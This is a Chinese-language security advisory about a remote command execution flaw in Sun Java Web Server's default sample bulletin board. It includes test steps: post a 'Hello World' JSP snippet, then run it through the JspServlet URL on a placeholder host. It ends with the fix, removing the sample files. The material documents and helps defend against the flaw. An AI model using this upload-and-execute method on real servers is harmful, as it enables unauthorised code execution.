Sun Java Web服務(wù)器遠(yuǎn)程可執(zhí)行命令漏洞
發(fā)表時間:2023-08-19 來源:明輝站整理相關(guān)軟件相關(guān)文章人氣:
[摘要]Sun Java Web服務(wù)器遠(yuǎn)程可執(zhí)行命令漏洞 漏洞發(fā)布時間:2000-7-13 17:41:00漏 洞 描 述:在Solaris and Windows NT的Sun Java Web Serv...
Sun Java Web服務(wù)器遠(yuǎn)程可執(zhí)行命令漏洞
漏洞發(fā)布時間:2000-7-13 17:41:00
漏 洞 描 述:
在Solaris and Windows NT的Sun Java Web Server默認(rèn)安裝設(shè)置下。通過公告版的樣板程序的漏洞,可以遠(yuǎn)程執(zhí)行任意命令。
漏洞測試方法如下:
下面的例子將顯示如何上載和執(zhí)行該代碼,而在服務(wù)器上顯示"Hello World"。
輸入下面的JSP代碼將打印出"Hello World":
<% String s="Hello World"; %>
<%=s %>
通過下面的公告版連接Post這段代碼:
http://jws.site/examples/applications/bboard/bboard_frames.html
檢驗是否該代碼真正的上載了:
http://jws.site/board.html
通過執(zhí)行下面的連接編譯和執(zhí)行該代碼:
http://jws.site/servlet/com.sun.server.http.pagecompile.jsp.runtime.JspServlet/board.html
解 決 方 法:
仔細(xì)按照J(rèn)ava Web Server手冊中的"How to secure a web site that uses the Java Web Server" 一章進(jìn)行設(shè)置,或者參考下面連接:
http://www.sun.com/software/jwebserver/faq/jwsca-2000-02.html
或者簡單的移除默認(rèn)安裝的這些樣板文件。
